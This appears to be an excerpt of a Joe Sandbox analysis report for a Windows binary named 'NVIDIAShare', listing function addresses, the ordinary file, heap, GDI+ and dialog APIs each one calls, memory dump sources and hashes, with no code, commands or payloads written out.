Part of subcall function 010297E5: SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
Part of subcall function 010297E5: _abort.LIBCMT ref: 01029863

Part of subcall function 0102BB4E: _abort.LIBCMT ref: 0102BB80
Part of subcall function 0102BB4E: _free.LIBCMT ref: 0102BBB4

Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6

_free.LIBCMT ref: 0102BA9F
_free.LIBCMT ref: 0102BAD5

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
Instruction ID: 93a33c4286e6209fb94db67e843b16da32ba58145b6613e35fb493199b194c46
Opcode Fuzzy Hash: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
Instruction Fuzzy Hash: 68312D3190422AAFDB21EFACD440BDD77F5EF40325F2541DAE5849B2A1EB765D40CB50

Function 01001E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01001E55

Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF

_wcslen.LIBCMT ref: 01001EFD

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
Instruction ID: e5c9adad6ff5dd0153a5b92cc96599982bf1690653ebffbaffdfee554a6e74f8
Opcode Fuzzy Hash: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
Instruction Fuzzy Hash: 92312C7190410A9FEF16DF98C944AEEBBF5BF58304F10009DE585A7290C7369E15CB60

Function 01009DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
Instruction ID: 9d7a2f22e67313912af0d7f27b090b44b064072031fe6cfd9ec0339a49277ed1
Opcode Fuzzy Hash: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
Instruction Fuzzy Hash: 602128312882869FE716DF38C491AABBFE8AF51308F08495DF5C987182D339D90DCB61

Function 0100966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,01009F27,?,?,0100771A), ref: 010096E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,01009F27,?,?,0100771A), ref: 01009716

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
Instruction ID: afe85808430fbd69eac987090d6ecf19bd39f063ff70a4f5062835919f52a8bd
Opcode Fuzzy Hash: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
Instruction Fuzzy Hash: 5221B0715043446FF3718A69CC88BE7B7DCEB49328F000A19FADAC65C6C778A884C631

Function 01009E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 01009EC7
GetLastError.KERNEL32 ref: 01009ED4

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
Instruction ID: eebab815987d1a6cb08529afbc0710887e3d1c3d3ade0c4db6194a97a0a7c768
Opcode Fuzzy Hash: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
Instruction Fuzzy Hash: F31129306007009BF736C628C884BA6B7E9AB44324F50066AE1D7D25D2D371FD45C760

Function 01028E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01028E75

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,01041098,010017CE,?,?,00000007,?,?,?,010013D6,?,00000000), ref: 01028EB1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
Instruction ID: 720aae6f796c395268371445326ddd5f49e266975745dca50c8381c85006ceac
Opcode Fuzzy Hash: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
Instruction Fuzzy Hash: 28F0F63A60113666EF712A299C04BAF3BDC8FD1B70F14C167E9D4AB1A0DB71D80082A1

Function 0101109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 010110AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 010110B2

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
Instruction ID: 21b0b98479194364472a30493d2ee0ad574a45758da9e8ffa8ad674cd6026171
Opcode Fuzzy Hash: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
Instruction Fuzzy Hash: CDE09232F00145A78F1E86B898159EBB6DDEB4410431442B9F683D7109F9B9D90147A0

Function 0100A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
Instruction ID: dfecebb3c25db30f3a306a5fe564f37bbcbf9af66a54902cfd2954a1a09ce2ea
Opcode Fuzzy Hash: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
Instruction Fuzzy Hash: DCF0A03220020EBBEF125E60DC80FDA37ACBF04386F448050B984D6194DB72DA94DB10

Function 0100A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
Instruction ID: 250eb872ac89ff47c26f0ed0e59c379980176d0260efe9afa50024a3bcd7ff0b
Opcode Fuzzy Hash: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
Instruction Fuzzy Hash: 86E09235240219BBEB125E64DC84FDA779CBF083C2F484061B984D6094EB66D984DB50

Function 0101AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,01032641,000000FF), ref: 0101ACB0
CoUninitialize.COMBASE(?,?,?,?,01032641,000000FF), ref: 0101ACB5

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
Instruction ID: 0c719d34694ec5a249f6c3af8ed90ed3625840bd0b588d3d89010c0fb862b74a
Opcode Fuzzy Hash: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
Instruction Fuzzy Hash: DAE06572604650EFC7119B59D845B49FBBCFB88E20F00426AE456D7764CB786800CB90

Function 0100A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A254

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A280

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
Instruction ID: 6c71e386091b5bdf15c179c71d1aff966f09c5afab805abd46f3b72d8e2a1d1d
Opcode Fuzzy Hash: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
Instruction Fuzzy Hash: C1E092356001289BEB62AB68CC04BD9BB9CAB193E1F0442B1FEC4E71C4DA75DD44CBA0

Function 0101DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0101DEEC

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(00000065,?), ref: 0101DF03

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
Instruction ID: 1f5f3ccfaf945375bf1b625b4b1d4cacb1a305ed9fc8e4cfaa4704c6759713d9
Opcode Fuzzy Hash: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
Instruction Fuzzy Hash: DAE022B640024837EF12ABA0DC05FDE3BAC5B14385F040C92B380EA0E2DA3DEA108760

Function 0101081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
Instruction ID: 22e2e2a25e81002e0623cd0a974ceeb2be398cfe2c0ac787b5441860d31de914
Opcode Fuzzy Hash: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
Instruction Fuzzy Hash: 52E048765002186BDB11A694DC44FDABBACFF093D1F0400657AC5D2048D678D6C4CBB0

Function 0101A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0101A3E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
Instruction ID: 23d3827fdd94843ec17865931beb3aa99bafda72f3863520f4b14d8d68d07ee4
Opcode Fuzzy Hash: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
Instruction Fuzzy Hash: EFE0ED71501219EBDB51DF59C5407DEBBE8FB14260F10C05AA88697204E2B8AA04DBA1

Function 01022B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01022BB5

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
Instruction ID: e7c785687a0f8a4355ed3da6b01cbf429825379159570fce305615d4bcd914ea
Opcode Fuzzy Hash: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
Instruction Fuzzy Hash: 99D02234198332185C6B3EFA38065CD338ABD51B79BE003DEE8E08E8C1EE1990409211

Function 010012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 01001306
ShowWindow.USER32(00000000), ref: 0100130D

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
Instruction ID: a782aa06b10ed4b03b03cbbc244e87ccace00316b49aae77fcd4b5e3ab742883
Opcode Fuzzy Hash: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
Instruction Fuzzy Hash: 32C0123245C200FECB010BB4DC0AC2BBBB8BBA6312F04C908F0E9C8064C23EC010DB91

Function 01001A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01001A09

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
